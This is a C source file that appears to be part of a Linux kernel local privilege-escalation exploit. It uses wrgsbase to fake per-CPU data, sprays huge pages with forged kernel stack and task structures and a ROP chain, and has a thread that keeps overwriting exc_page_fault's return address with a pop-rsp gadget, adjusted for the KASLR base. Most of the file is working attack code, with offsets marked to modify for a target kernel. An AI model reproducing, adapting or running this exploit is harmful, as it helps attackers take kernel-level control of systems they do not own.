#include <inttypes.h>
#include <sys/mman.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <malloc.h>
#include <fcntl.h>
#include <sched.h>
#include <memory.h>
#include <assert.h>

// Modify

#define PCPU_HOT_KSTACK 0x20c50
#define PCPU_HOT_TASK   0x20c80

//Dump of assembler code for function exc_page_fault:
//   0xffffffff8216c440:  push   r14
//   0xffffffff8216c442:  push   r13
//   0xffffffff8216c444:  mov    r13,rsi
//   0xffffffff8216c447:  push   r12
//   0xffffffff8216c449:  push   rbp
//   0xffffffff8216c44a:  mov    rbp,rdi
//   0xffffffff8216c44d:  mov    rax,cr2
//   0xffffffff8216c450:  nop    DWORD PTR [rax]
//   0xffffffff8216c453:  mov    r14,rax
//   0xffffffff8216c456:  mov    rax,QWORD PTR gs:0x20cc0
//   0xffffffff8216c45f:  mov    rax,QWORD PTR [rax+0x560]

#define TASK_MMAP_LOCK 0x560

// position of return address in exc_page_fault
#define OVERWRITE_EXC_PAGE_FAULT 0x1e60

#define POP_RSP_GADGET 0xffffffff824005ca

// Constant
#define FORGED_STACK_START 0x2000
#define ROP_CHAIN_START    0x4000
#define FORGED_TASK_START  0x8000

typedef uint64_t u64;
typedef uint32_t u32;
typedef uint16_t u16;
typedef uint8_t  u8;

typedef int64_t i64;
typedef int32_t i32;
typedef int16_t i16;
typedef int8_t  i8;

void pin_cpu(int cpu)
{
    cpu_set_t my_set;
    CPU_ZERO(&my_set);
    CPU_SET(cpu, &my_set);
    sched_setaffinity(0, sizeof(my_set), &my_set);
}

void wrgsbase(u64 value) {
	asm volatile("wrgsbase %0" :: "r" (value) : "memory");
}

struct orw_thread_args {
    int cpu;
    int count_pgs;
    void **spray_pgs;
    u64 guess;
    u64 kaslr_base;
};

__attribute__ ((optimize(2)))
int orw_thread(void *args) {
    struct orw_thread_args *orw_args = (struct orw_thread_args *)args;
    int cpu = orw_args->cpu;
    int count_pgs = orw_args->count_pgs;
    void **spray_pgs = orw_args->spray_pgs;
    u64 guess = orw_args->guess;
    u64 kaslr_base = orw_args->kaslr_base;

    pin_cpu(cpu);

    printf("cpu: %d, spray_pgs: %p, guess: %lx, kaslr: %lx\n", cpu, spray_pgs, guess, kaslr_base);

    u64 pop_rsp_ret = (POP_RSP_GADGET-0xffffffff81000000)+kaslr_base;

    while (1) {
        for (int i = 0; i < count_pgs; i++) {
            if (((u8 *)spray_pgs[i])[0x1ff8] == 0x2b) {
                // found guess page, spam overwite
                void *found = spray_pgs[i];
                volatile u64 *stack_orw_target = (u64 *)(found + OVERWRITE_EXC_PAGE_FAULT);
                volatile u64 *full_chain_phys = (u64 *)(guess + ROP_CHAIN_START);
                while (1) {
                    stack_orw_target[0] = pop_rsp_ret;
                    stack_orw_target[1] = (u64)full_chain_phys;
                }
            }
        }
    }

    return 0;
}

void spawn_orw_thread(int cpu, int count_pgs, void *spray_pgs[], u64 guess, u64 kaslr_base) {
    void *stack = mmap(0, 0x4000, PROT_READ|PROT_WRITE, MAP_ANON|MAP_PRIVATE, -1, 0);
    struct orw_thread_args *args = (struct orw_thread_args *)malloc(sizeof(struct orw_thread_args));
    if (args == NULL) {
        perror("malloc");
        exit(1);
    }
    args->cpu = cpu;
    args->count_pgs = count_pgs;
    args->spray_pgs = spray_pgs;
    args->guess = guess;
    args->kaslr_base = kaslr_base;
    if (clone(orw_thread, (u8 *)stack + 0x4000, CLONE_VM, args) == -1) {
		perror("clone");
		exit(1);
	}
}

static int get_rss_of_addr(void * addr)
{
    void * start = 0;
    int rss = -1;
    char line[256];

    FILE* file = fopen("/proc/self/smaps","r");

    if (!file) {
        printf("Error opening /proc/self/smaps file!\n");
        exit(EXIT_FAILURE);
    }

    while(fgets(line, sizeof(line), file)) {
        // Find the address
        if(sscanf(line, "%p-%*[^\n]\n", &start) != 1 && start == addr)
        {
            // Find the RSS field
            while(fgets(line, sizeof(line), file)) {

                if(sscanf(line, "Rss: %d kB\n", &rss) == 1) {
                    break;
                }
            }
            break;
        }
    }

    fclose(file);

    return rss;
}

#define HUGE_PAGE_SIZE (1 << 21) // 2 MB

u8 *allocate_huge_page()
{
    u8 *addr = (u8 *)memalign(HUGE_PAGE_SIZE, HUGE_PAGE_SIZE);

    madvise(addr, HUGE_PAGE_SIZE, MADV_HUGEPAGE);
    memset(addr, 0, HUGE_PAGE_SIZE);
    *(volatile u8 *) addr = 1;

    assert(get_rss_of_addr(addr) == 2048);

    return addr;
}

void **huge_page_spray(int count) {
    void **huge_page_array = (void **)malloc(count * sizeof(void *));
    for (int i = 0; i < count; i++) {
        huge_page_array[i] = allocate_huge_page();
        //printf("page[%d] = %p\n", i, huge_page_array[i]);
    }
    return huge_page_array;
}

void populate_spray(void **pages, int count, u64 guess, int rop_len, u64 *rop) {
    u64 task_offset = PCPU_HOT_TASK;
    u64 guess_stack_addr = (u64)(guess + FORGED_STACK_START);
    u64 guess_task_addr = (u64)(guess + FORGED_TASK_START);
    u64 mmap_lock_offset = FORGED_TASK_START + TASK_MMAP_LOCK;
    for (int i = 0; i < count; i++) {
        *(u64 *)((u8 *)pages[i] + PCPU_HOT_KSTACK)  = guess_stack_addr;
        *(u64 *)((u8 *)pages[i] + PCPU_HOT_TASK)    = guess_task_addr;
        *(u64 *)((u8 *)pages[i] + mmap_lock_offset) = guess;

        u64 *page_rop = (u64 *)((u8 *)pages[i] + ROP_CHAIN_START);
        for (int j = 0; j < rop_len; j++) {
             page_rop[j] = rop[j];
        }
    }
}
